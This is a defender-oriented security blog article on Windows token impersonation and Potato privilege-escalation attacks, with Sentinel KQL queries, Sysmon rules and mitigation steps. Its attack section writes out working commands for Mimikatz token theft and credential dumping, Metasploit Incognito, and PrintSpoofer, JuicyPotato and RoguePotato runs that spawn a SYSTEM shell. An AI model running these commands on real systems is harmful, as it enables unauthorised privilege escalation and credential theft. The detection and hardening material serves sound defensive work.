SeImpersonatePrivilege
The Windows privilege that enables token impersonation: typically held by IIS worker processes, SQL Server, and any service running as NetworkService or LocalService
4672
Event ID logged when a special privilege is assigned to a new logon: key for detecting SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeTcbPrivilege use
Potato attacks
Family of Windows privilege escalation tools (JuicyPotato, PrintSpoofer, RoguePotato) that abuse SeImpersonatePrivilege to escalate from service account to SYSTEM
Incognito
Metasploit module that lists and steals available Windows tokens from running processes: commonly used for token manipulation after initial access

SponsoredRetool

Retool's new app builder is where AI-generated code ships safely

Building apps with AI is easy. Getting them to production safely is another story.

Start building for free today

Windows access tokens are the security credentials that determine what resources a process can access. Every process has a primary token (set at creation) and can acquire impersonation tokens from other users: which is a legitimate feature for services that need to act on behalf of clients.

Attackers abuse this mechanism in two ways: by stealing tokens from privileged processes (token theft via Mimikatz token::elevate or Metasploit Incognito), and by abusing SeImpersonatePrivilege held by service accounts to force SYSTEM to impersonate them (Potato attack family). Both result in attacker code running with privileges well above the initial compromise level.

Token Impersonation Techniques

Technique 1: Token theft from privileged processes (Mimikatz/Incognito)

# Mimikatz token elevation: steals a token from a SYSTEM process
mimikatz# privilege::debug          # Get SeDebugPrivilege
mimikatz# token::elevate            # Impersonate SYSTEM by stealing token from winlogon.exe
mimikatz# sekurlsa::logonpasswords  # Now running as SYSTEM: can dump all hashes

# Metasploit Incognito (enumerate available tokens)
meterpreter> use incognito
meterpreter> list_tokens -u
# Output:
# Delegation Tokens Available:
#   CORP\DomainAdmin        ← Domain admin is logged in and their token is available
#   NT AUTHORITY\SYSTEM
#
meterpreter> impersonate_token "CORP\DomainAdmin"

Technique 2: SeImpersonatePrivilege abuse (Potato attacks)

Services running as NetworkService, LocalService, or IIS AppPool identities have SeImpersonatePrivilege. Potato attacks create a named pipe server that tricks SYSTEM or Network Service into connecting, then impersonate that connection token.

# PrintSpoofer (modern Potato variant: works on Windows 10, Server 2019/2022)
PrintSpoofer.exe -i -c cmd.exe
# Result: cmd.exe running as NT AUTHORITY\SYSTEM

# JuicyPotato (older, requires specific CLSID)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}

# RoguePotato (uses NTLM relay instead of CLSID)
RoguePotato.exe -r 10.0.0.100 -e "cmd.exe" -l 9999

Technique 3: CreateProcessWithToken API

// Attacker code that opens a privileged process token and spawns a new process with it
IntPtr hToken;
OpenProcessToken(privilegedProcessHandle, TOKEN_ALL_ACCESS, out hToken);
DuplicateTokenEx(hToken, ..., SecurityImpersonation, TokenPrimary, out hDupToken);
CreateProcessWithTokenW(hDupToken, 0, "cmd.exe", null, ...)
// Result: cmd.exe inherits the stolen token's privileges

Detection: Event Log Signals

Event ID 4672: Special privileges assigned to new logon:

When a token with special privileges is used to create a new logon session, Event 4672 is logged. This fires legitimately for admin logons but becomes suspicious when the subject account is a service account or when specific dangerous privileges appear.

// Sentinel KQL: detect dangerous privilege assignments from service accounts
SecurityEvent
| where EventID == 4672
| where TimeGenerated > ago(24h)
// Privileges that enable token manipulation:
| where PrivilegeList contains "SeImpersonatePrivilege"
    or PrivilegeList contains "SeAssignPrimaryTokenPrivilege"
    or PrivilegeList contains "SeTcbPrivilege"  // Act as part of OS: rarely legitimate
    or PrivilegeList contains "SeCreateTokenPrivilege"  // Create arbitrary tokens: almost never legitimate
// Filter service accounts where these are anomalous
| where SubjectUserName !in~ ("SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE")  // Expected
    or PrivilegeList contains "SeCreateTokenPrivilege"  // Never legitimate for most accounts
| summarize count() by SubjectUserName, PrivilegeList, Computer
| sort by count_ desc

Event ID 4688: A new process was created (with parent-child anomalies):

// Detect cmd.exe or PowerShell spawned by IIS (w3wp.exe) or SQL Server (sqlservr.exe)
// These are the typical service accounts that have SeImpersonatePrivilege
SecurityEvent
| where EventID == 4688
| where ParentProcessName has_any ("w3wp.exe", "sqlservr.exe", "msdtc.exe", "services.exe")
    and NewProcessName has_any ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
        "JuicyPotato.exe", "PrintSpoofer.exe", "RoguePotato.exe")
| project TimeGenerated, Computer, SubjectUserName, ParentProcessName, NewProcessName, CommandLine
| sort by TimeGenerated desc

Sysmon Event ID 10: Process Access (token theft via OpenProcessToken):

<!-- Sysmon config to detect token theft: watching for OpenProcess on lsass.exe 
     or winlogon.exe with token-relevant access masks -->
<EventFiltering>
  <ProcessAccess onmatch="include">
    <!-- Access masks: 0x1000 (PROCESS_QUERY_INFORMATION) + 0x40 (DUP_HANDLE) = token theft -->
    <TargetImage condition="is">C:\Windows\System32\winlogon.exe</TargetImage>
    <TargetImage condition="is">C:\Windows\System32\lsass.exe</TargetImage>
    <GrantedAccess condition="is">0x1040</GrantedAccess>  <!-- QueryInfo + DupHandle -->
    <GrantedAccess condition="is">0x1400</GrantedAccess>  <!-- QueryInfo + QueryLtdInfo -->
  </ProcessAccess>
</EventFiltering>
Free daily briefing

Briefings like this, every morning before 9am.

Threat intel, active CVEs, and campaign alerts, distilled for practitioners. 50,000+ subscribers. No noise.

Detection: Potato Attack Specific Signals

Potato attacks create named pipes, trigger SYSTEM authentication, and then impersonate: generating detectable named pipe and impersonation events.

Sysmon Event ID 17/18: Named Pipe Created/Connected:

// Detect suspicious named pipe creation by non-system processes (Potato attacks)
SysmonEvent
| where EventID in (17, 18)
| where TimeGenerated > ago(24h)
// PrintSpoofer creates pipes like \pipe\spoolss or \pipe\SPOOLSS
| where PipeName contains_any ("spoolss", "PIPE", "RPC")
    and Image !contains "\\Windows\\System32\\"
    and Image !contains "\\Windows\\SysWOW64\\"
| project TimeGenerated, Computer, Image, PipeName, User

Network connection from SYSTEM after Potato attack:

// PrintSpoofer forces SpoolSS to connect back: detect SYSTEM connecting to localhost
SysmonEvent
| where EventID == 3  // Network connection
| where User == "NT AUTHORITY\\SYSTEM"
    and DestinationIp == "127.0.0.1"
    and DestinationPort > 1024  // Unusual high port: attacker's named pipe server
| project TimeGenerated, Computer, Image, DestinationIp, DestinationPort

Mitigation: remove SeImpersonatePrivilege from unnecessary accounts:

# Use secedit to audit SeImpersonatePrivilege assignments
secedit /export /cfg C:\temp\secpolicy.cfg /areas USER_RIGHTS
Select-String -Path C:\temp\secpolicy.cfg -Pattern "SeImpersonatePrivilege"
# Output: SeImpersonatePrivilege = *S-1-5-20,*S-1-5-19,*S-1-5-6,...

# Remove SeImpersonatePrivilege from accounts that don't need it
# Accounts that legitimately need it: IIS AppPool, SQL Server service accounts, COM+ apps
# IIS mitigation: run application pools as custom service accounts with minimal rights
# (NOT as built-in NetworkService which has SeImpersonatePrivilege)

# Configure via GPO:
# Computer Configuration > Windows Settings > Security Settings > Local Policies >
# User Rights Assignment > "Impersonate a client after authentication"
# Remove: Everyone, Users: keep only specific service accounts that require it

The bottom line

Token impersonation attacks escalate from service account to SYSTEM (Potato attacks using SeImpersonatePrivilege) or steal privileged tokens from running processes (Mimikatz token::elevate, Incognito). Detection: Event ID 4672 for dangerous privilege assignments, Event 4688 parent-child anomalies (cmd.exe spawned by w3wp.exe), Sysmon Event 10 for OpenProcessToken calls on winlogon.exe, and Sysmon Events 17/18 for named pipe creation by non-system processes. Mitigation: remove SeImpersonatePrivilege from accounts that do not require it and run IIS application pools as custom accounts with minimal rights rather than NetworkService.

Frequently asked questions

What is Windows token impersonation?

Windows token impersonation is an attack where a low-privilege process steals or assumes the security token of a higher-privilege process: gaining that process's permissions without knowing the target account's credentials. Common implementations include Potato attacks (abusing SeImpersonatePrivilege to escalate to SYSTEM) and Mimikatz token::elevate (stealing tokens from privileged processes like winlogon.exe).

How do you detect Potato attacks and token impersonation?

Monitor Event ID 4688 for cmd.exe or PowerShell spawned by IIS (w3wp.exe) or SQL Server processes (SeImpersonatePrivilege holders), Event ID 4672 for SeCreateTokenPrivilege or SeAssignPrimaryTokenPrivilege on service accounts, Sysmon Event 10 for OpenProcess calls on winlogon.exe or lsass.exe with token-relevant access masks, and Sysmon Events 17/18 for named pipe creation by non-system processes (Potato attacks create named pipes to trigger SYSTEM authentication).

What is Windows token impersonation and how do attackers abuse it?

Windows access tokens are kernel objects that represent the security context of a process or thread: they carry the user identity, group memberships, and privileges. SeImpersonatePrivilege allows a process to impersonate another user's token. Attackers with a service account that has SeImpersonatePrivilege (IIS, SQL Server, and many other service accounts have this by default) can use Potato-family exploits (PrintSpoofer, RoguePotato, GodPotato) to coerce SYSTEM-level authentication from Windows, then impersonate the SYSTEM token — escalating from a service account to SYSTEM privileges without exploiting a code vulnerability.

How do Potato attacks work in Windows privilege escalation?

Potato attacks exploit Windows COM object interactions and token impersonation. The attack flow: an attacker running as a service account creates a named pipe and registers a COM object that causes SYSTEM to authenticate to their pipe; when the SYSTEM process connects, the attacker captures and impersonates the SYSTEM token using SeImpersonatePrivilege. Modern variants (PrintSpoofer, GodPotato) target different COM objects and printer spooler coercion paths. The defense: remove SeImpersonatePrivilege from service accounts that do not need it; this privilege is required by IIS application pools and SQL Server but is often granted unnecessarily to third-party service accounts. Check SeImpersonatePrivilege assignments with: Get-ADUser -Filter * -Properties PasswordLastSet | Where service account names.

How do I prevent privilege escalation from service accounts on Windows?

Service account privilege escalation prevention: (1) Remove SeImpersonatePrivilege from service accounts that do not need it — audit with 'whoami /priv' on accounts running services. (2) Migrate service accounts to gMSAs: Group Managed Service Accounts run with minimal privileges and automatically rotated passwords. (3) Run IIS application pools under least-privileged identities ('ApplicationPoolIdentity' virtual accounts) rather than domain service accounts. (4) Enable Windows Defender Exploit Protection on service host processes to restrict dangerous API calls. (5) Monitor for Potato attack tool signatures in EDR: PrintSpoofer, GodPotato, and RoguePotato all have known process and file signatures. (6) Patch Windows promptly: Microsoft has patched some Potato variants at the OS level in cumulative updates.

How do I write a Sysmon configuration to detect token impersonation without generating excessive noise?

Effective Sysmon coverage for token impersonation focuses on three event types with targeted filters. For Event ID 10 (ProcessAccess), target TargetImage values of lsass.exe and winlogon.exe and filter for GrantedAccess values that include 0x0040 (DuplicateHandle) combined with 0x0400 (QueryInformation) -- the access mask combination required to steal a token. Exclude known-legitimate callers such as MsMpEng.exe (Defender), svchost.exe accessing lsass for standard authentication, and your EDR agent process by specifying their full paths in exclude rules. For Event ID 17 and 18 (PipeEvent), monitor for named pipe creation where the Image is not in System32 or SysWOW64 and the PipeName contains substrings common to Potato attacks ('spoolss', 'epmapper', 'MsFteWds'). For Event ID 1 (ProcessCreate), alert on cmd.exe or PowerShell where the ParentImage is w3wp.exe, sqlservr.exe, or WmiPrvSE.exe and the IntegrityLevel is 'System' -- this combination indicates a successful privilege escalation from a service account to SYSTEM. Test your configuration against the Atomic Red Team T1134 tests before deploying to production to verify detection coverage without alert fatigue.

Sources & references

  1. MITRE ATT&CK T1134: Access Token Manipulation
  2. Microsoft: Access Tokens and Security
  3. Forensic Focus: Token Impersonation in DFIR

Free resources

25
Free download

Critical CVE Reference Card 2025–2026

25 actively exploited vulnerabilities with CVSS scores, exploit status, and patch availability. Print it, pin it, share it with your SOC team.

No spam. Unsubscribe anytime.

Free download

Ransomware Incident Response Playbook

Step-by-step 24-hour IR checklist covering detection, containment, eradication, and recovery. Built for SOC teams, IR leads, and CISOs.

No spam. Unsubscribe anytime.

Free newsletter

Get threat intel before your inbox does.

50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, daily, no spam.

Unsubscribe anytime. We never sell your data.

Eric Bang
Author

Founder & Cybersecurity Evangelist, Decryption Digest

Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals every morning.

Black Hat Giveaway

Win a $2,495 Black Hat pass.

Full-access to Black Hat USA 2026 in Las Vegas. Subscribe free to enter.

Joins Decryption Digest daily briefing. Unsubscribe anytime.

Giveaway: Black Hat USA 2026 Full-Access Pass ($2,495 value)

Details →
Daily Briefing

Subscribe to enter the giveaway

Every subscriber is automatically entered. You also get daily threat intel every morning: zero-days, ransomware, and nation-state campaigns. Free. No spam.

Already subscribed? You're already entered.

Giveaway

Win a $2,495 Black Hat USA 2026 pass.